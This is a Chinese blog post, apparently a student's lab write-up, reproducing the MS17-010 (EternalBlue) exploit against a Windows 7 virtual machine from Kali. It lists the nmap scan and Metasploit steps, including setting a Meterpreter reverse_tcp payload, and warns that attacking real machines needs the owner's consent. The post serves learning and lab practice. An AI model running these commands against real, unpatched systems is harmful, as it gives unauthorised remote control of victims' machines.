01 攻防实验一:ms17-010(永恒之蓝)漏洞复现

已于 2024-07-09 14:22:52 修改
阅读量372 收藏
点赞数
分类专栏: 安全 文章标签: 安全
于 2023-09-14 00:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61649980/article/details/132850282
版权

影响范围

Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016

实验目的

利用已经披露的漏洞报告,复现微软 windows 7 系统利用 ms17-010 漏洞,获取系统最高权限

实验要求

获取目标主机的系统权限

实验环境

同一局域网下的两设备,为保证安全性,这里的两台设备采用的是虚拟机

实验设备

环境IP地址
目标主机windows 7192.168.3.121
攻击主机kali192.168.3.119

数据来源

目标主机提供

实验步骤

1. 切换管理员账户

sudo su

2. 端口扫描

使用 nmap 进行端口扫描,发现目标主机 445 端口开启,那么该主机下可能存在 ms17-010 漏洞。

nmap 192.168.1.121

3. 加载 ms17-010 攻击模块

msfconsole
use ms17-010

4. 对 445 端口进行漏洞扫

        4.1 加载扫描工具
use 3
        4.2 查看需要配置的参数
show options
        4.3 设置目标主机地址
set rhosts 192.168.3.121

        4.4 运行扫描,查看目标主机下是否存在该漏洞
run

5. 加载 ms17-010 攻击模块

检查发现该目标主机下存在该漏洞,加载攻击模块

use 0

6. 设置连接方式为反向连接

加载攻击模后,默认连接方式为反向连接

set payload windows/x64/meterpreter/reverse_tcp

7. 设置主机地址为目标主机

set rhosts 192.168.3.121

8. 攻击

run

实验结果

最后截图纪念

实验总结

这个漏洞是自己亲手做的第一个实验,对于自己本人来说,具有特殊意义。在这其中,需要注意以下几点

  1. 实验在 VMware 虚拟机环境下,尽量使用 NAT 网络,不要使用桥接模式
  2. 如果windows 7 中有杀毒软件,这个实验可能无法进行下去,因为杀毒软件可能已经这个漏洞修复
  3. 加载 ms17-010 攻击时,可以不用指定连接方式,因为默认就是反向连接
  4. 如果要攻击真实的物理机,一定要征求机主同意
学习中进步
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络安全实验Windows防火墙应用.docx
09-14
网络安全实验Windows防火墙应用.docx
永恒之蓝ms17-010)借助kali进行攻击win7实验报告
m0_65096687的博客
09-03 2805
永恒之蓝复现学习笔记
永恒之蓝ms17-010)小实验
tmyzxy1314的博客
12-22 788
永恒之蓝漏洞复现
永恒之蓝实验 MS17-010
qq_43355651的博客
10-31 2788
永恒之蓝MS17-010是2016年8月公开的漏洞,基于445端口迅速传播扩散,危害超出想象的严重。 实验准备: 虚拟机下kali攻击机:192.168.111.128 w7靶机:192.168.111.129 在同一网段并且能ping通 首先利用nmap对靶机进行扫描 Nmap -sV 192.168.111.129 发现存在开放445端口 那我们可以利用永恒之蓝进行入侵 打开msfconsole 搜索ms17-010 这边我们可以进行选择可以利用的模块 use exploit
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 198
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝
网络攻防之-针对ms17-010脚本(python)
12-23
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,...
网络攻防实验ms12-020.docx
08-29
网络攻防实验 MS12-020 MS12-020 是一个危险的漏洞,影响了微软 Windows 操作系统的安全。该漏洞使得攻击者可以在victim机器上执行恶意代码,从而获取系统控制权。下面我们将详细介绍 MS12-020 漏洞的原理、危害性...
MS17-010.docx
06-11
MS17-010漏洞操作文档,网络攻防平时作业,MS17-010漏洞操作文档,网络攻防平时作业
网络攻防实验环境构建---18
05-05
该文档详细介绍了网络攻防环境的构建,每一步骤都很详细,每一步都配有截图加文字说明。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1151
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 733
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1192
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 847
系统的外部可观察行为和物理特征
网络安全威胁情报到底是什么
学-> 思->用
07-10 496
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 528
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 476
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
移动应用安全需求分析与安全保护工程
weixin_48579910的博客
07-12 1111
移动应用安全面临许多威胁,包括数据泄露、恶意软件、应用漏洞、不安全的网络通信和数据存储等。通过实施数据保护、安全编码、网络通信安全、应用加固、权限管理、安全更新和用户教育等措施,可以有效地提高移动应用的安全性,保护用户数据和隐私。综合采用安全开发生命周期(SDL)和持续安全监控与响应策略,确保移动应用在整个生命周期内的安全性。Android系统通过一系列系统级、应用级和用户级的安全机制,提供了全面的保护。应用沙盒、权限模型、SELinux、数据加密、应用签名、代码混淆等措施,有效地防止了多种安全威胁。
qvd-2023-45061漏洞复现
12-25
qvd-2023-45061漏洞是指某个系统或软件中存在的安全漏洞。为了验证这个漏洞,需要进行漏洞复现,即重现漏洞的过程。首先,需要在具有相同环境和配置的测试系统上进行操作。其次,需要根据漏洞的描述和已知信息,尝试触发漏洞并记录操作步骤和结果。在进行漏洞复现的过程中,需要注意保护好测试环境,避免对系统造成实际危害。 在qvd-2023-45061漏洞复现的过程中,可以尝试利用已知的payload或者编写自定义的代码来触发漏洞,记录漏洞触发的条件和效果。在复现过程中,也可以尝试不同的输入和操作,寻找漏洞的边界和影响范围。同时,需要及时记录复现的过程和结果,以便进一步的分析和修复。 当漏洞成功复现后,应该及时向相关安全团队或厂商报告漏洞,并提供详细的复现过程和结果。漏洞复现的结果将有助于安全团队更好地理解漏洞的本质和影响,有助于及时修复和防范类似的漏洞。此外,漏洞复现也是安全研究和攻防技术提升的重要手段,通过复现漏洞可以加深对漏洞原理和利用方法的理解,提高安全防护和应对能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学习中进步

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值